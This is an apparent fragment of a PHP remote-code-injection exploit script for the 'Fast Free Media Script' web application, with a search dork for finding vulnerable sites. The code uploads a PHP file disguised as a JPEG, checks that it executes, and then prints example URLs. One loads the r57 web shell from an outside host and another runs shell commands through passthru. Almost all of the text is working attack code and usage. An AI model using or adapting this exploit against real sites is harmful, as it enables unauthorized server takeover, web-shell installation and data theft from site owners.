Fast Free Media Script Remote Code Ýnjection Exploit
Coded By Liz0ziM
Web:www.biyosecurity.com
Dork:"Powered by FastFreeMedia.com" & inurl:cat-1-p0.html & inurl:page.php?page=topvids & inurl:page.php?page=topgames
Sending Exploit..
';
sleep(5);
$data='
-----------------------------17459113492913
Content-Disposition: form-data; name="biyosecurity"; filename="bst.php"
Content-Type: image/jpeg;
-----------------------------17459113492913
';
$paket ="POST ".$p." HTTP/1.0\r\n";
$paket.="Content-Type: multipart/form-data; boundary=---------------------------17459113492913\r\n";
$paket.="Host: ".$host."\r\n";
$paket.="Content-Length: ".strlen($data)."\r\n";
$paket.="Connection: close\r\n\r\n";
$paket.=$data;
yolla($host,$paket);
sleep(5);
$packet ="GET /media/upload/bst.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
yolla($host,$packet);
if (eregi("biyosecurity",$veri))
{
$mesaj='
Exploit succeeded...
insert evil code :http://'.$host.$klasor.'media/upload/bst.php
Example: http://'.$host.$klasor.'media/upload/bst.php?liz0=include($_GET[x]);&x=http://www.r57.li/r57.txt?
Example2: http://'.$host.$klasor.'media/upload/bst.php?liz0=passthru($_GET[x]);&x=ls
';
}
else
{
$mesaj='Exploit Failed !';
}
}
echo $mesaj;
?>